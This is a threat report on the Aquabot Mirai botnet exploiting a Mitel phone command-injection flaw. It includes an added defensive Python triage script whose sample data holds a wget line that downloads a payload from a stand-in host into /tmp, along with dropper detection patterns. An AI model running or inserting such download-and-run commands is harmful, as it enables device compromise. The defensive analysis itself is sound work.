Aquabot Botnet

A Mirai-based botnet variant, known as Aquabot, has been detected actively attempting to exploit a security flaw affecting Mitel phones. The attackers aim to integrate these devices into a botnet capable of launching Distributed Denial-of-Service (DDoS) attacks.

The Vulnerability in Focus: CVE-2024-41710

The targeted security flaw, CVE-2024-41710, carries a CVSS score of 6.8 and stems from a command injection vulnerability in the boot process. This flaw may permit attackers to execute arbitrary commands within the phone's operating environment.

Affected Devices and Patch Details

The vulnerability impacts multiple Mitel phone models, including the 6800 Series, 6900 Series, 6900w Series SIP Phones, and the 6970 Conference Unit. Mitel addressed the issue in July 2024, but a proof-of-concept (PoC) exploit became publicly available in August, potentially opening the door for threat actors.

More than One Vulnerability in Play

Beyond CVE-2024-41710, Aquabot has been observed targeting additional vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, and CVE-2023-26801. The botnet has also attempted to exploit a remote code execution flaw in Linksys E-series devices, indicating a broad attack surface.

Aquabot: A Mirai-Based Botnet with a History

Aquabot is a botnet derived from the notorious Mirai framework, designed explicitly for executing DDoS attacks. Researchers have been tracking its activity since November 2023, with evidence of continuous evolution.

Exploiting the Flaw: Attack Mechanism

The first signs of active exploitation against CVE-2024-41710 emerged in early January 2025. Attackers deploy the botnet malware by executing a shell script, which retrieves the threatening payload using the 'wget' command. The attack method closely resembles the publicly available PoC exploit.

A Stealthier and More Advanced Variant

The Aquabot variant involved in these attacks appears to be the third iteration of the malware. It introduces a novel 'report_kill' function, which reports back to the Command-and-Control (C2) server whenever the botnet process is terminated. However, there is no evidence that this function triggers any immediate response from the server.

In addition, the new variant disguises itself as 'httpd.x86' to avoid detection and is programmed to terminate specific processes, such as local shells. These refinements suggest efforts to make Aquabot more evasive and potentially detect competing botnet activity.
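A small defender-side triage check built from the indicators named above (the 'httpd.x86' process name and a payload fetched with wget), as an added example that is not part of the original report; the process snapshot lines, the reason labels and the host name payload.invalid are constructed for illustration.

```python
import re

# Constructed sample process snapshot (not real telemetry), one process per line:
# "<pid> <user> <executable path> <command line>"
SAMPLE_PROCS = [
    "1201 root /usr/sbin/httpd httpd -k start",
    "2310 root /tmp/httpd.x86 httpd.x86",
    "2344 admin /bin/sh sh -c wget http://payload.invalid/httpd.x86 -O /tmp/httpd.x86",
    "2401 root /usr/sbin/sshd sshd: admin [priv]",
]

# Indicators taken from the report: the binary names itself 'httpd.x86', and the
# dropper is a shell script that retrieves the payload with wget.
MASQUERADE_NAMES = {"httpd.x86"}
# Directories a legitimate daemon binary should never execute from on these devices
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# wget invocation writing its download to an explicit output path (-O <path>)
WGET_RE = re.compile(r"\bwget\b[^;&|]*?\s-O\s+(\S+)")


def triage(lines):
    """Return (pid, reason, detail) tuples for processes matching the indicators."""
    findings = []
    for line in lines:
        pid, _user, path, cmd = line.split(" ", 3)
        name = path.rsplit("/", 1)[-1]
        if name in MASQUERADE_NAMES:
            findings.append((pid, "masquerading-name", name))
        elif path.startswith(WRITABLE_DIRS):
            # Any binary executing from a world-writable directory is worth a look
            findings.append((pid, "binary-in-writable-dir", path))
        m = WGET_RE.search(cmd)
        if m and m.group(1).startswith(WRITABLE_DIRS):
            # Shell fetching a file into a writable directory: the dropper pattern
            findings.append((pid, "wget-dropper", m.group(1)))
    return findings


if __name__ == "__main__":
    for pid, reason, detail in triage(SAMPLE_PROCS):
        print(f"pid {pid}: {reason} ({detail})")
```

On a real device the same logic would be fed from a process listing rather than the constructed snapshot, and any hit should be correlated with the patch status for CVE-2024-41710.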

Selling Access: The Underground DDoS-for-Hire Operation

Signs point to the threat actors behind Aquabot offering their botnet as a DDoS service on Telegram. They operate under aliases such as Cursinq Firewall, The Eye Services, and The Eye Botnet, leveraging compromised hosts to provide attack capabilities to paying customers.

The Bigger Picture: Mirai’s Lingering Threat

The resurgence of Mirai-based threats like Aquabot highlights the continued risks associated with internet-connected devices. Many of these devices suffer from inadequate security, outdated software, or default credentials, making them easy targets for exploitation.

A Misleading Justification from Attackers

Threat actors often claim their botnet operations are purely for testing or educational purposes, attempting to mislead researchers and law enforcement. However, further analysis frequently reveals their true intentions: offering DDoS services or openly boasting about their botnet activities in underground forums and Telegram channels.